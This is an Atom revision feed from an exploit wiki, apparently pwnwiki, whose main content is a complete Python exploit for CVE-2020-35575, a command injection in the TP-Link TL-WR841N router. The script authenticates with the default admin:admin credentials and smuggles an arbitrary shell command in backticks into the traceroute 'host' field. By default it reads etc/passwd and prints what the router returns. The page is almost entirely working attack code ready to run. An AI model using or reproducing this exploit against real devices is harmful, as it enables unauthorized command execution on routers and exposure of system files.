https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-35575_TP-Link_TL-WR841N_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
CVE-2020-35575 TP-Link TL-WR841N 命令注入漏洞 - Revision history
2026-04-06T21:51:38Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2020-35575_TP-Link_TL-WR841N_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=5880&oldid=prev
Pwnwiki: Marked this version for translation
2021-06-24T09:41:55Z
<p>Marked this version for translation</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 09:41, 24 June 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>==影響版本==</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==影響版本== <ins class="diffchange diffchange-inline"><!--T:1--></ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Version: TL-WR841N 0.9.1 4.0</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Version: TL-WR841N 0.9.1 4.0</div></td></tr>
</table>
Pwnwiki
https://pwnwiki.com/index.php?title=CVE-2020-35575_TP-Link_TL-WR841N_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=5878&oldid=prev
Pwnwiki: Created page with "<languages /> <translate> ==影響版本== </translate> Version: TL-WR841N 0.9.1 4.0 ==EXP== <pre> # Exploit Title: TP-Link TL-WR841N - Command Injection # Date: 2020-12-13 #..."
2021-06-24T09:40:34Z
<p>Created page with "<languages /> <translate> ==影響版本== </translate> Version: TL-WR841N 0.9.1 4.0 ==EXP== <pre> # Exploit Title: TP-Link TL-WR841N - Command Injection # Date: 2020-12-13 #..."</p>
<p><b>New page</b></p><div><languages /><br />
<translate><br />
==影響版本==<br />
</translate><br />
Version: TL-WR841N 0.9.1 4.0<br />
<br />
==EXP==<br />
<pre><br />
# Exploit Title: TP-Link TL-WR841N - Command Injection<br />
# Date: 2020-12-13<br />
# Exploit Author: Koh You Liang<br />
# Vendor Homepage: https://www.tp-link.com/<br />
# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip<br />
# Version: TL-WR841N 0.9.1 4.0<br />
# Tested on: Windows 10<br />
# CVE : CVE-2020-35575<br />
<br />
import requests<br />
import sys<br />
import time<br />
<br />
try:<br />
_ = sys.argv[2]<br />
payload = ' '.join(sys.argv[1:])<br />
except IndexError:<br />
try:<br />
payload = sys.argv[1]<br />
except IndexError:<br />
print("[*] Command not specified, using the default `cat etc/passwd=`")<br />
payload = 'cat etc/passwd'<br />
<br />
# Default credentials is admin:admin - replace with your own<br />
cookies = {<br />
'Authorization': 'Basic YWRtaW46YWRtaW4='<br />
}<br />
<br />
headers = {<br />
'Host': '192.168.0.1',<br />
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0',<br />
'Accept': '*/*',<br />
'Accept-Language': 'en-US,en;q=0.5',<br />
'Accept-Encoding': 'gzip, deflate',<br />
'Content-Type': 'text/plain',<br />
'Content-Length': '197',<br />
'Origin': 'http://192.168.0.1',<br />
'Connection': 'close',<br />
'Referer': 'http://192.168.0.1/mainFrame.htm',<br />
}<br />
<br />
data1 = \<br />
'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload)<br />
response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)<br />
print('[+] Sending payload...')<br />
<br />
try:<br />
response1.text.splitlines()[0]<br />
except IndexError:<br />
sys.exit('[-] Cannot get response. Please check your cookie.')<br />
if response1.text.splitlines()[0] != '[error]0':<br />
sys.exit('[*] Router/Firmware is not vulnerable.')<br />
<br />
data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'<br />
response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)<br />
print('[+] Receiving response from router...')<br />
time.sleep(0.8) # Buffer time for traceroute to succeed<br />
<br />
data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n'''<br />
response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)<br />
<br />
if '=:' in response3.text.splitlines()[3]:<br />
print('[-] Command not supported.')<br />
else:<br />
print('[+] Exploit successful!')<br />
for line_number, line in enumerate(response3.text.splitlines()):<br />
try:<br />
if line_number == 3:<br />
print(line[12:])<br />
if line_number > 3 and line != '[error]0':<br />
print(line)<br />
if 'not known' in line:<br />
break<br />
except IndexError:<br />
break<br />
<br />
</pre></div>
Pwnwiki